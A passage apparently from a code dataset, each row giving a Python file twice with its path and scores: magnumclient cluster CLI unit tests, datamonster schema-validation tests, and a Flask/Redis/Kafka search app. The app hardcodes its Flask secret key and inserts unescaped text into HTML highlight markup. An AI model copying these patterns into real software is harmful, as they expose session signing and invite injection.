self.clusters_mock.delete.assert_has_calls([call('foo'), call('bar')])
def test_cluster_delete_bad_uuid(self):
arglist = ['foo']
verifylist = [('cluster', ['foo'])]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
returns = self.cmd.take_action(parsed_args)
self.assertEqual(returns, None)
def test_cluster_delete_no_uuid(self):
arglist = []
verifylist = [('cluster', [])]
self.assertRaises(magnum_fakes.MagnumParseException,
self.check_parser, self.cmd, arglist, verifylist)
class TestClusterList(TestCluster):
attr = dict()
attr['name'] = 'fake-cluster-1'
_cluster = magnum_fakes.FakeCluster.create_one_cluster(attr)
columns = [
'uuid',
'name',
'keypair',
'node_count',
'master_count',
'status',
'health_status'
]
datalist = (
(
_cluster.uuid,
_cluster.name,
_cluster.keypair,
_cluster.node_count,
_cluster.master_count,
_cluster.status,
_cluster.health_status,
),
)
def setUp(self):
super(TestClusterList, self).setUp()
self.clusters_mock.list = mock.Mock()
self.clusters_mock.list.return_value = [self._cluster]
# Get the command object to test
self.cmd = osc_clusters.ListCluster(self.app, None)
def test_cluster_list_no_options(self):
arglist = []
verifylist = [
('limit', None),
('sort_key', None),
('sort_dir', None),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.clusters_mock.list.assert_called_with(
limit=None,
sort_dir=None,
sort_key=None,
)
self.assertEqual(self.columns, columns)
self.assertEqual(self.datalist, tuple(data))
def test_cluster_list_options(self):
arglist = [
'--limit', '1',
'--sort-key', 'key',
'--sort-dir', 'asc'
]
verifylist = [
('limit', 1),
('sort_key', 'key'),
('sort_dir', 'asc')
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.clusters_mock.list.assert_called_with(
limit=1,
sort_dir='asc',
sort_key='key',
)
def test_cluster_list_bad_sort_dir_fail(self):
arglist = [
'--sort-dir', 'foo'
]
verifylist = [
('limit', None),
('sort_key', None),
('sort_dir', 'foo'),
('fields', None),
]
self.assertRaises(magnum_fakes.MagnumParseException,
self.check_parser, self.cmd, arglist, verifylist)
class TestClusterUpdate(TestCluster):
def setUp(self):
super(TestClusterUpdate, self).setUp()
self.clusters_mock.update = mock.Mock()
self.clusters_mock.update.return_value = None
# Get the command object to test
self.cmd = osc_clusters.UpdateCluster(self.app, None)
def test_cluster_update_pass(self):
arglist = ['foo', 'remove', 'bar']
verifylist = [
('cluster', 'foo'),
('op', 'remove'),
('attributes', [['bar']]),
('rollback', False)
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.clusters_mock.update.assert_called_with(
'foo',
[{'op': 'remove', 'path': '/bar'}]
)
def test_cluster_update_bad_op(self):
arglist = ['foo', 'bar', 'snafu']
verifylist = [
('cluster', 'foo'),
('op', 'bar'),
('attributes', ['snafu']),
('rollback', False)
]
self.assertRaises(magnum_fakes.MagnumParseException,
self.check_parser, self.cmd, arglist, verifylist)
class TestClusterShow(TestCluster):
def setUp(self):
super(TestClusterShow, self).setUp()
attr = dict()
attr['name'] = 'fake-cluster-1'
self._cluster = magnum_fakes.FakeCluster.create_one_cluster(attr)
self.clusters_mock.get = mock.Mock()
self.clusters_mock.get.return_value = self._cluster
# Get the command object to test
self.cmd = osc_clusters.ShowCluster(self.app, None)
self.data = tuple(map(lambda x: getattr(self._cluster, x),
osc_clusters.CLUSTER_ATTRIBUTES))
def test_cluster_show_pass(self):
arglist = ['fake-cluster']
verifylist = [
('cluster', 'fake-cluster')
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.clusters_mock.get.assert_called_with('fake-cluster')
self.assertEqual(osc_clusters.CLUSTER_ATTRIBUTES, columns)
self.assertEqual(self.data, data)
def test_cluster_show_no_cluster_fail(self):
arglist = []
verifylist = []
self.assertRaises(magnum_fakes.MagnumParseException,
self.check_parser, self.cmd, arglist, verifylist)
@contextmanager
def capture(command, *args, **kwargs):
out, sys.stdout = sys.stdout, StringIO()
try:
command(*args, **kwargs)
sys.stdout.seek(0)
yield sys.stdout.read()
finally:
sys.stdout = out
class TestClusterConfig(TestCluster):
def setUp(self):
super(TestClusterConfig, self).setUp()
attr = dict()
attr['name'] = 'fake-cluster-1'
attr['status'] = 'CREATE_COMPLETE'
self._cluster = magnum_fakes.FakeCluster.create_one_cluster(attr)
self.clusters_mock.get = mock.Mock()
self.clusters_mock.get.return_value = self._cluster
cert = magnum_fakes.FakeCert(pem='foo bar')
self.certificates_mock.create = mock.Mock()
self.certificates_mock.create.return_value = cert
self.certificates_mock.get = mock.Mock()
self.certificates_mock.get.return_value = cert
# Fake the cluster_template
attr = dict()
attr['name'] = 'fake-ct'
self._cluster_template = \
magnum_fakes.FakeClusterTemplate.create_one_cluster_template(attr)
self.cluster_templates_mock = \
self.app.client_manager.container_infra.cluster_templates
self.cluster_templates_mock.get = mock.Mock()
self.cluster_templates_mock.get.return_value = self._cluster_template
# Get the command object to test
self.cmd = osc_clusters.ConfigCluster(self.app, None)
def test_cluster_config_no_cluster_fail(self):
arglist = []
verifylist = []
self.assertRaises(magnum_fakes.MagnumParseException,
self.check_parser, self.cmd, arglist, verifylist)
@mock.patch.dict(os.environ, {'SHELL': '/bin/bash'})
def test_cluster_config_custom_dir_with_config_only_works_if_force(self):
tmp_dir = tempfile.mkdtemp()
open(os.path.join(tmp_dir, 'config'), 'a').close() # touch config
arglist = ['fake-cluster', '--dir', tmp_dir]
verifylist = [
('cluster', 'fake-cluster'),
('force', False),
('dir', tmp_dir),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.assertRaises(exceptions.CommandError,
self.cmd.take_action, parsed_args)
self.clusters_mock.get.assert_called_with('fake-cluster')
arglist = ['fake-cluster', '--force', '--dir', tmp_dir]
verifylist = [
('cluster', 'fake-cluster'),
('force', True),
('dir', tmp_dir),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
expected_value = '''\
export KUBECONFIG={}/config
'''.format(tmp_dir)
with capture(self.cmd.take_action, parsed_args) as output:
self.assertEqual(expected_value, output)
self.clusters_mock.get.assert_called_with('fake-cluster')
@mock.patch.dict(os.environ, {'SHELL': '/bin/bash'})
def test_cluster_config_with_custom_dir(self):
tmp_dir = tempfile.mkdtemp()
arglist = ['fake-cluster', '--dir', tmp_dir]
verifylist = [
('cluster', 'fake-cluster'),
('dir', tmp_dir),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
expected_value = '''\
export KUBECONFIG={}/config
'''.format(tmp_dir)
with capture(self.cmd.take_action, parsed_args) as output:
self.assertEqual(expected_value, output)
self.clusters_mock.get.assert_called_with('fake-cluster')
@mock.patch.dict(os.environ, {'SHELL': '/bin/bash'})
def test_cluster_config_creates_config_in_cwd_if_not_dir_specified(self):
tmp_dir = tempfile.mkdtemp()
os.chdir(tmp_dir)
arglist = ['fake-cluster']
verifylist = [
('cluster', 'fake-cluster'),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
expected_value = '''\
export KUBECONFIG={}/config
'''.format(os.getcwd())
with capture(self.cmd.take_action, parsed_args) as output:
self.assertEqual(expected_value, output)
self.clusters_mock.get.assert_called_with('fake-cluster')
class TestClusterResize(TestCluster):
def setUp(self):
super(TestClusterResize, self).setUp()
self.cluster = mock.Mock()
self.cluster.uuid = "UUID1"
self.clusters_mock.resize = mock.Mock()
self.clusters_mock.resize.return_value = None
self.clusters_mock.get = mock.Mock()
self.clusters_mock.get.return_value = self.cluster
# Get the command object to test
self.cmd = osc_clusters.ResizeCluster(self.app, None)
def test_cluster_resize_pass(self):
arglist = ['foo', '2']
verifylist = [
('cluster', 'foo'),
('node_count', 2),
('nodes_to_remove', None),
('nodegroup', None)
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.clusters_mock.resize.assert_called_with(
"UUID1", 2, None, None
)
class TestClusterUpgrade(TestCluster):
def setUp(self):
super(TestClusterUpgrade, self).setUp()
self.cluster = mock.Mock()
self.cluster.uuid = "UUID1"
self.clusters_mock.upgrade = mock.Mock()
self.clusters_mock.upgrade.return_value = None
self.clusters_mock.get = mock.Mock()
self.clusters_mock.get.return_value = self.cluster
# Get the command object to test
self.cmd = osc_clusters.UpgradeCluster(self.app, None)
def test_cluster_upgrade_pass(self):
cluster_template_id = 'TEMPLATE_ID'
arglist = ['foo', cluster_template_id]
verifylist = [
('cluster', 'foo'),
('cluster_template', cluster_template_id),
('max_batch_size', 1),
('nodegroup', None)
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.clusters_mock.upgrade.assert_called_with(
"UUID1", cluster_template_id, 1, None
) | magnumclient/tests/osc/unit/v1/test_clusters.py |
import copy
import mock
import os
import sys
import tempfile
from contextlib import contextmanager
try:
from StringIO import StringIO
except ImportError:
from io import StringIO
from mock import call
from magnumclient import exceptions
from magnumclient.osc.v1 import clusters as osc_clusters
from magnumclient.tests.osc.unit.v1 import fakes as magnum_fakes
class TestCluster(magnum_fakes.TestMagnumClientOSCV1):
def setUp(self):
super(TestCluster, self).setUp()
self.clusters_mock = self.app.client_manager.container_infra.clusters
self.certificates_mock = \
self.app.client_manager.container_infra.certificates
class TestClusterCreate(TestCluster):
def setUp(self):
super(TestClusterCreate, self).setUp()
attr = dict()
attr['name'] = 'fake-cluster-1'
self._cluster = magnum_fakes.FakeCluster.create_one_cluster(attr)
self._default_args = {
'cluster_template_id': 'fake-ct',
'create_timeout': 60,
'discovery_url': None,
'keypair': None,
'master_count': 1,
'name': 'fake-cluster-1',
'node_count': 1,
}
self.clusters_mock.create = mock.Mock()
self.clusters_mock.create.return_value = self._cluster
self.clusters_mock.get = mock.Mock()
self.clusters_mock.get.return_value = copy.deepcopy(self._cluster)
self.clusters_mock.update = mock.Mock()
self.clusters_mock.update.return_value = self._cluster
# Get the command object to test
self.cmd = osc_clusters.CreateCluster(self.app, None)
self.data = tuple(map(lambda x: getattr(self._cluster, x),
osc_clusters.CLUSTER_ATTRIBUTES))
def test_cluster_create_required_args_pass(self):
"""Verifies required arguments."""
arglist = [
'--cluster-template', self._cluster.cluster_template_id,
self._cluster.name
]
verifylist = [
('cluster_template', self._cluster.cluster_template_id),
('name', self._cluster.name)
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.clusters_mock.create.assert_called_with(**self._default_args)
def test_cluster_create_missing_required_arg(self):
"""Verifies missing required arguments."""
arglist = [
self._cluster.name
]
verifylist = [
('name', self._cluster.name)
]
self.assertRaises(magnum_fakes.MagnumParseException,
self.check_parser, self.cmd, arglist, verifylist)
def test_cluster_create_with_labels(self):
"""Verifies labels are properly parsed when given as argument."""
expected_args = self._default_args
expected_args['labels'] = {
'arg1': 'value1', 'arg2': 'value2'
}
arglist = [
'--cluster-template', self._cluster.cluster_template_id,
'--labels', 'arg1=value1',
'--labels', 'arg2=value2',
self._cluster.name
]
verifylist = [
('cluster_template', self._cluster.cluster_template_id),
('labels', ['arg1=value1', 'arg2=value2']),
('name', self._cluster.name)
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.clusters_mock.create.assert_called_with(**expected_args)
class TestClusterDelete(TestCluster):
def setUp(self):
super(TestClusterDelete, self).setUp()
self.clusters_mock.delete = mock.Mock()
self.clusters_mock.delete.return_value = None
# Get the command object to test
self.cmd = osc_clusters.DeleteCluster(self.app, None)
def test_cluster_delete_one(self):
arglist = ['foo']
verifylist = [('cluster', ['foo'])]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.clusters_mock.delete.assert_called_with('foo')
def test_cluster_delete_multiple(self):
arglist = ['foo', 'bar']
verifylist = [('cluster', ['foo', 'bar'])]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.clusters_mock.delete.assert_has_calls([call('foo'), call('bar')])
def test_cluster_delete_bad_uuid(self):
arglist = ['foo']
verifylist = [('cluster', ['foo'])]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
returns = self.cmd.take_action(parsed_args)
self.assertEqual(returns, None)
def test_cluster_delete_no_uuid(self):
arglist = []
verifylist = [('cluster', [])]
self.assertRaises(magnum_fakes.MagnumParseException,
self.check_parser, self.cmd, arglist, verifylist)
class TestClusterList(TestCluster):
attr = dict()
attr['name'] = 'fake-cluster-1'
_cluster = magnum_fakes.FakeCluster.create_one_cluster(attr)
columns = [
'uuid',
'name',
'keypair',
'node_count',
'master_count',
'status',
'health_status'
]
datalist = (
(
_cluster.uuid,
_cluster.name,
_cluster.keypair,
_cluster.node_count,
_cluster.master_count,
_cluster.status,
_cluster.health_status,
),
)
def setUp(self):
super(TestClusterList, self).setUp()
self.clusters_mock.list = mock.Mock()
self.clusters_mock.list.return_value = [self._cluster]
# Get the command object to test
self.cmd = osc_clusters.ListCluster(self.app, None)
def test_cluster_list_no_options(self):
arglist = []
verifylist = [
('limit', None),
('sort_key', None),
('sort_dir', None),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.clusters_mock.list.assert_called_with(
limit=None,
sort_dir=None,
sort_key=None,
)
self.assertEqual(self.columns, columns)
self.assertEqual(self.datalist, tuple(data))
def test_cluster_list_options(self):
arglist = [
'--limit', '1',
'--sort-key', 'key',
'--sort-dir', 'asc'
]
verifylist = [
('limit', 1),
('sort_key', 'key'),
('sort_dir', 'asc')
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.clusters_mock.list.assert_called_with(
limit=1,
sort_dir='asc',
sort_key='key',
)
def test_cluster_list_bad_sort_dir_fail(self):
arglist = [
'--sort-dir', 'foo'
]
verifylist = [
('limit', None),
('sort_key', None),
('sort_dir', 'foo'),
('fields', None),
]
self.assertRaises(magnum_fakes.MagnumParseException,
self.check_parser, self.cmd, arglist, verifylist)
class TestClusterUpdate(TestCluster):
def setUp(self):
super(TestClusterUpdate, self).setUp()
self.clusters_mock.update = mock.Mock()
self.clusters_mock.update.return_value = None
# Get the command object to test
self.cmd = osc_clusters.UpdateCluster(self.app, None)
def test_cluster_update_pass(self):
arglist = ['foo', 'remove', 'bar']
verifylist = [
('cluster', 'foo'),
('op', 'remove'),
('attributes', [['bar']]),
('rollback', False)
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.clusters_mock.update.assert_called_with(
'foo',
[{'op': 'remove', 'path': '/bar'}]
)
def test_cluster_update_bad_op(self):
arglist = ['foo', 'bar', 'snafu']
verifylist = [
('cluster', 'foo'),
('op', 'bar'),
('attributes', ['snafu']),
('rollback', False)
]
self.assertRaises(magnum_fakes.MagnumParseException,
self.check_parser, self.cmd, arglist, verifylist)
class TestClusterShow(TestCluster):
def setUp(self):
super(TestClusterShow, self).setUp()
attr = dict()
attr['name'] = 'fake-cluster-1'
self._cluster = magnum_fakes.FakeCluster.create_one_cluster(attr)
self.clusters_mock.get = mock.Mock()
self.clusters_mock.get.return_value = self._cluster
# Get the command object to test
self.cmd = osc_clusters.ShowCluster(self.app, None)
self.data = tuple(map(lambda x: getattr(self._cluster, x),
osc_clusters.CLUSTER_ATTRIBUTES))
def test_cluster_show_pass(self):
arglist = ['fake-cluster']
verifylist = [
('cluster', 'fake-cluster')
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
columns, data = self.cmd.take_action(parsed_args)
self.clusters_mock.get.assert_called_with('fake-cluster')
self.assertEqual(osc_clusters.CLUSTER_ATTRIBUTES, columns)
self.assertEqual(self.data, data)
def test_cluster_show_no_cluster_fail(self):
arglist = []
verifylist = []
self.assertRaises(magnum_fakes.MagnumParseException,
self.check_parser, self.cmd, arglist, verifylist)
@contextmanager
def capture(command, *args, **kwargs):
out, sys.stdout = sys.stdout, StringIO()
try:
command(*args, **kwargs)
sys.stdout.seek(0)
yield sys.stdout.read()
finally:
sys.stdout = out
class TestClusterConfig(TestCluster):
def setUp(self):
super(TestClusterConfig, self).setUp()
attr = dict()
attr['name'] = 'fake-cluster-1'
attr['status'] = 'CREATE_COMPLETE'
self._cluster = magnum_fakes.FakeCluster.create_one_cluster(attr)
self.clusters_mock.get = mock.Mock()
self.clusters_mock.get.return_value = self._cluster
cert = magnum_fakes.FakeCert(pem='foo bar')
self.certificates_mock.create = mock.Mock()
self.certificates_mock.create.return_value = cert
self.certificates_mock.get = mock.Mock()
self.certificates_mock.get.return_value = cert
# Fake the cluster_template
attr = dict()
attr['name'] = 'fake-ct'
self._cluster_template = \
magnum_fakes.FakeClusterTemplate.create_one_cluster_template(attr)
self.cluster_templates_mock = \
self.app.client_manager.container_infra.cluster_templates
self.cluster_templates_mock.get = mock.Mock()
self.cluster_templates_mock.get.return_value = self._cluster_template
# Get the command object to test
self.cmd = osc_clusters.ConfigCluster(self.app, None)
def test_cluster_config_no_cluster_fail(self):
arglist = []
verifylist = []
self.assertRaises(magnum_fakes.MagnumParseException,
self.check_parser, self.cmd, arglist, verifylist)
@mock.patch.dict(os.environ, {'SHELL': '/bin/bash'})
def test_cluster_config_custom_dir_with_config_only_works_if_force(self):
tmp_dir = tempfile.mkdtemp()
open(os.path.join(tmp_dir, 'config'), 'a').close() # touch config
arglist = ['fake-cluster', '--dir', tmp_dir]
verifylist = [
('cluster', 'fake-cluster'),
('force', False),
('dir', tmp_dir),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.assertRaises(exceptions.CommandError,
self.cmd.take_action, parsed_args)
self.clusters_mock.get.assert_called_with('fake-cluster')
arglist = ['fake-cluster', '--force', '--dir', tmp_dir]
verifylist = [
('cluster', 'fake-cluster'),
('force', True),
('dir', tmp_dir),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
expected_value = '''\
export KUBECONFIG={}/config
'''.format(tmp_dir)
with capture(self.cmd.take_action, parsed_args) as output:
self.assertEqual(expected_value, output)
self.clusters_mock.get.assert_called_with('fake-cluster')
@mock.patch.dict(os.environ, {'SHELL': '/bin/bash'})
def test_cluster_config_with_custom_dir(self):
tmp_dir = tempfile.mkdtemp()
arglist = ['fake-cluster', '--dir', tmp_dir]
verifylist = [
('cluster', 'fake-cluster'),
('dir', tmp_dir),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
expected_value = '''\
export KUBECONFIG={}/config
'''.format(tmp_dir)
with capture(self.cmd.take_action, parsed_args) as output:
self.assertEqual(expected_value, output)
self.clusters_mock.get.assert_called_with('fake-cluster')
@mock.patch.dict(os.environ, {'SHELL': '/bin/bash'})
def test_cluster_config_creates_config_in_cwd_if_not_dir_specified(self):
tmp_dir = tempfile.mkdtemp()
os.chdir(tmp_dir)
arglist = ['fake-cluster']
verifylist = [
('cluster', 'fake-cluster'),
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
expected_value = '''\
export KUBECONFIG={}/config
'''.format(os.getcwd())
with capture(self.cmd.take_action, parsed_args) as output:
self.assertEqual(expected_value, output)
self.clusters_mock.get.assert_called_with('fake-cluster')
class TestClusterResize(TestCluster):
def setUp(self):
super(TestClusterResize, self).setUp()
self.cluster = mock.Mock()
self.cluster.uuid = "UUID1"
self.clusters_mock.resize = mock.Mock()
self.clusters_mock.resize.return_value = None
self.clusters_mock.get = mock.Mock()
self.clusters_mock.get.return_value = self.cluster
# Get the command object to test
self.cmd = osc_clusters.ResizeCluster(self.app, None)
def test_cluster_resize_pass(self):
arglist = ['foo', '2']
verifylist = [
('cluster', 'foo'),
('node_count', 2),
('nodes_to_remove', None),
('nodegroup', None)
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.clusters_mock.resize.assert_called_with(
"UUID1", 2, None, None
)
class TestClusterUpgrade(TestCluster):
def setUp(self):
super(TestClusterUpgrade, self).setUp()
self.cluster = mock.Mock()
self.cluster.uuid = "UUID1"
self.clusters_mock.upgrade = mock.Mock()
self.clusters_mock.upgrade.return_value = None
self.clusters_mock.get = mock.Mock()
self.clusters_mock.get.return_value = self.cluster
# Get the command object to test
self.cmd = osc_clusters.UpgradeCluster(self.app, None)
def test_cluster_upgrade_pass(self):
cluster_template_id = 'TEMPLATE_ID'
arglist = ['foo', cluster_template_id]
verifylist = [
('cluster', 'foo'),
('cluster_template', cluster_template_id),
('max_batch_size', 1),
('nodegroup', None)
]
parsed_args = self.check_parser(self.cmd, arglist, verifylist)
self.cmd.take_action(parsed_args)
self.clusters_mock.upgrade.assert_called_with(
"UUID1", cluster_template_id, 1, None
) | 0.520253 | 0.257255 |
import pandas as pd
from datamonster_api import DataGroupColumn
def assert_object_matches_data_group(data_group, data_group_obj):
assert data_group_obj["_id"] == data_group.id
assert data_group_obj["name"] == data_group.name
assert len(data_group_obj["columns"]) == len(data_group.columns)
dg_col_name_to_type = {col.name: col.type_ for col in data_group.columns}
for col in data_group_obj["columns"]:
assert col["name"] in dg_col_name_to_type
assert col["type_"] == dg_col_name_to_type[col["name"]]
def test_missing_column_is_missing(data_group):
missing_date_col = pd.DataFrame([
{'number col': 1, 'string col': 'a'},
{'number col': 2, 'string col': 'a'},
])
missing, extra, bad_dates = data_group._validate_schema(missing_date_col)
assert(extra == [])
assert(bad_dates == [])
assert(len(missing) == 1)
assert(str(missing[0]) == str(DataGroupColumn('date col', 'date')))
missing_number_col = pd.DataFrame([
{'date col': '2006-06-06', 'string col': 'a'},
{'date col': '2006-06-06', 'string col': 'a'},
])
missing, extra, bad_dates = data_group._validate_schema(missing_number_col)
assert(extra == [])
assert(bad_dates == [])
assert(len(missing) == 1)
assert(str(missing[0]) == str(DataGroupColumn('number col', 'number')))
missing_string_col = pd.DataFrame([
{'date col': '2006-06-06', 'number col': 1},
{'date col': '2006-06-06', 'number col': 3},
])
missing, extra, bad_dates = data_group._validate_schema(missing_string_col)
assert(extra == [])
assert(bad_dates == [])
assert(len(missing) == 1)
assert(str(missing[0]) == str(DataGroupColumn('string col', 'string')))
def test_bad_dates_not_missing_or_extra(data_group):
bad_date_type = pd.DataFrame([
{'date col': '2006-6-06', 'string col': 'a', 'number col': 1},
{'date col': '2006-06-06', 'string col': 'b', 'number col': 2},
])
missing, extra, bad_dates = data_group._validate_schema(bad_date_type)
assert(len(bad_dates) == 1)
assert(str(bad_dates[0]) == str(DataGroupColumn('date col', 'date')))
assert(missing == [])
assert(extra == [])
def test_bad_number_or_string_type_counted_as_missing_and_extra(data_group):
bad_number_type = pd.DataFrame([
{'date col': '2006-06-06', 'string col': 'a', 'number col': '1'},
{'date col': '2006-06-07', 'string col': 'b', 'number col': '2'},
])
missing, extra, bad_dates = data_group._validate_schema(bad_number_type)
assert(bad_dates == [])
assert(len(missing) == 1)
assert(str(missing[0]) == str(DataGroupColumn('number col', 'number')))
assert(len(extra) == 1)
assert(str(extra[0]) == str(DataGroupColumn('number col', 'string')))
bad_string_type = pd.DataFrame([
{'date col': '2006-06-06', 'string col': 1, 'number col': 1},
{'date col': '2006-06-07', 'string col': 2, 'number col': 2},
])
missing, extra, bad_dates = data_group._validate_schema(bad_string_type)
assert (bad_dates == [])
assert (len(missing) == 1)
assert (str(missing[0]) == str(DataGroupColumn('string col', 'string')))
assert (len(extra) == 1)
assert (str(extra[0]) == str(DataGroupColumn('string col', 'number'))) | datamonster_api/tests/lib/test_data_group.py | import pandas as pd
from datamonster_api import DataGroupColumn
def assert_object_matches_data_group(data_group, data_group_obj):
assert data_group_obj["_id"] == data_group.id
assert data_group_obj["name"] == data_group.name
assert len(data_group_obj["columns"]) == len(data_group.columns)
dg_col_name_to_type = {col.name: col.type_ for col in data_group.columns}
for col in data_group_obj["columns"]:
assert col["name"] in dg_col_name_to_type
assert col["type_"] == dg_col_name_to_type[col["name"]]
def test_missing_column_is_missing(data_group):
missing_date_col = pd.DataFrame([
{'number col': 1, 'string col': 'a'},
{'number col': 2, 'string col': 'a'},
])
missing, extra, bad_dates = data_group._validate_schema(missing_date_col)
assert(extra == [])
assert(bad_dates == [])
assert(len(missing) == 1)
assert(str(missing[0]) == str(DataGroupColumn('date col', 'date')))
missing_number_col = pd.DataFrame([
{'date col': '2006-06-06', 'string col': 'a'},
{'date col': '2006-06-06', 'string col': 'a'},
])
missing, extra, bad_dates = data_group._validate_schema(missing_number_col)
assert(extra == [])
assert(bad_dates == [])
assert(len(missing) == 1)
assert(str(missing[0]) == str(DataGroupColumn('number col', 'number')))
missing_string_col = pd.DataFrame([
{'date col': '2006-06-06', 'number col': 1},
{'date col': '2006-06-06', 'number col': 3},
])
missing, extra, bad_dates = data_group._validate_schema(missing_string_col)
assert(extra == [])
assert(bad_dates == [])
assert(len(missing) == 1)
assert(str(missing[0]) == str(DataGroupColumn('string col', 'string')))
def test_bad_dates_not_missing_or_extra(data_group):
bad_date_type = pd.DataFrame([
{'date col': '2006-6-06', 'string col': 'a', 'number col': 1},
{'date col': '2006-06-06', 'string col': 'b', 'number col': 2},
])
missing, extra, bad_dates = data_group._validate_schema(bad_date_type)
assert(len(bad_dates) == 1)
assert(str(bad_dates[0]) == str(DataGroupColumn('date col', 'date')))
assert(missing == [])
assert(extra == [])
def test_bad_number_or_string_type_counted_as_missing_and_extra(data_group):
bad_number_type = pd.DataFrame([
{'date col': '2006-06-06', 'string col': 'a', 'number col': '1'},
{'date col': '2006-06-07', 'string col': 'b', 'number col': '2'},
])
missing, extra, bad_dates = data_group._validate_schema(bad_number_type)
assert(bad_dates == [])
assert(len(missing) == 1)
assert(str(missing[0]) == str(DataGroupColumn('number col', 'number')))
assert(len(extra) == 1)
assert(str(extra[0]) == str(DataGroupColumn('number col', 'string')))
bad_string_type = pd.DataFrame([
{'date col': '2006-06-06', 'string col': 1, 'number col': 1},
{'date col': '2006-06-07', 'string col': 2, 'number col': 2},
])
missing, extra, bad_dates = data_group._validate_schema(bad_string_type)
assert (bad_dates == [])
assert (len(missing) == 1)
assert (str(missing[0]) == str(DataGroupColumn('string col', 'string')))
assert (len(extra) == 1)
assert (str(extra[0]) == str(DataGroupColumn('string col', 'number'))) | 0.655667 | 0.729869 |
import thread, redis
from kafka import SimpleProducer, KafkaClient
from flask import Flask, session
from flask.ext.session import Session
from query_subscriber import QuerySubscriber
from views import attach_views
from datetime import datetime
def highlight(word):
return("<span style=\"background-color: #FFFF00\">{0}</span>".format(word))
class StrawAppBase:
def __init__(self, config):
app = Flask(__name__)
app.secret_key = 'i love to search full text in real time'
# attach a redis connection pool
app.pool = redis.ConnectionPool(host="localhost", port=6379)
# user -> channels mapping
app.user_channels = {}
# how to handle messages that enter the stream from redis pub sub
def redis_message_handler(msg):
redis_connection = redis.Redis(connection_pool=app.pool)
# get channel and content of incoming message
channel = msg['channel']
data = msg['data']
# word highlighting -- TODO: this would be better to do in the search engine!
query = redis_connection.get(channel)
words = list(set(query.split(" ")))
for w in words:
data=data.lower().replace(w.lower(), highlight(w.lower()))
# find users subscribed to this channel
if app.user_channels.get(channel) is not None:
for user in app.user_channels.get(channel):
redis_connection.lpush(user, data)
else:
# no more users for this channel, unsubscribe from it
redis_connection.unsubscribe(channel)
# Add Redis query subscriber to app
app.disp = []
app.subscriber = QuerySubscriber("localhost", 6379, redis_message_handler)
# setup kafka producer in the app
kafka = KafkaClient("{0}:{1}".format(config["zookeeper_host"], 9092))
app.producer = SimpleProducer(kafka)
# add the app
self.app = app
def clear_user(self, uid):
redis_connection = redis.Redis(connection_pool=self.app.pool)
# print("Trying to clean for user {0}".format(uid))
# find all the queries to which the user is subscribed
# and remove them from the subscribers list for each query.
for qid in redis_connection.lrange(uid+"-queries", 0, -1):
try:
self.app.user_channels[qid].remove(uid)
except KeyError:
pass
# remove the user-queries
redis_connection.delete(uid+"-queries")
# remove the stored results
redis_connection.delete(uid)
def get_straw_app(config):
base = StrawAppBase(config)
app = base.app
app.clear_user = base.clear_user
attach_views(app)
return app | src/frontend/app/straw_app.py | import thread, redis
from kafka import SimpleProducer, KafkaClient
from flask import Flask, session
from flask.ext.session import Session
from query_subscriber import QuerySubscriber
from views import attach_views
from datetime import datetime
def highlight(word):
return("<span style=\"background-color: #FFFF00\">{0}</span>".format(word))
class StrawAppBase:
def __init__(self, config):
app = Flask(__name__)
app.secret_key = 'i love to search full text in real time'
# attach a redis connection pool
app.pool = redis.ConnectionPool(host="localhost", port=6379)
# user -> channels mapping
app.user_channels = {}
# how to handle messages that enter the stream from redis pub sub
def redis_message_handler(msg):
redis_connection = redis.Redis(connection_pool=app.pool)
# get channel and content of incoming message
channel = msg['channel']
data = msg['data']
# word highlighting -- TODO: this would be better to do in the search engine!
query = redis_connection.get(channel)
words = list(set(query.split(" ")))
for w in words:
data=data.lower().replace(w.lower(), highlight(w.lower()))
# find users subscribed to this channel
if app.user_channels.get(channel) is not None:
for user in app.user_channels.get(channel):
redis_connection.lpush(user, data)
else:
# no more users for this channel, unsubscribe from it
redis_connection.unsubscribe(channel)
# Add Redis query subscriber to app
app.disp = []
app.subscriber = QuerySubscriber("localhost", 6379, redis_message_handler)
# setup kafka producer in the app
kafka = KafkaClient("{0}:{1}".format(config["zookeeper_host"], 9092))
app.producer = SimpleProducer(kafka)
# add the app
self.app = app
def clear_user(self, uid):
redis_connection = redis.Redis(connection_pool=self.app.pool)
# print("Trying to clean for user {0}".format(uid))
# find all the queries to which the user is subscribed
# and remove them from the subscribers list for each query.
for qid in redis_connection.lrange(uid+"-queries", 0, -1):
try:
self.app.user_channels[qid].remove(uid)
except KeyError:
pass
# remove the user-queries
redis_connection.delete(uid+"-queries")
# remove the stored results
redis_connection.delete(uid)
def get_straw_app(config):
base = StrawAppBase(config)
app = base.app
app.clear_user = base.clear_user
attach_views(app)
return app | 0.321141 | 0.097176 |
import os
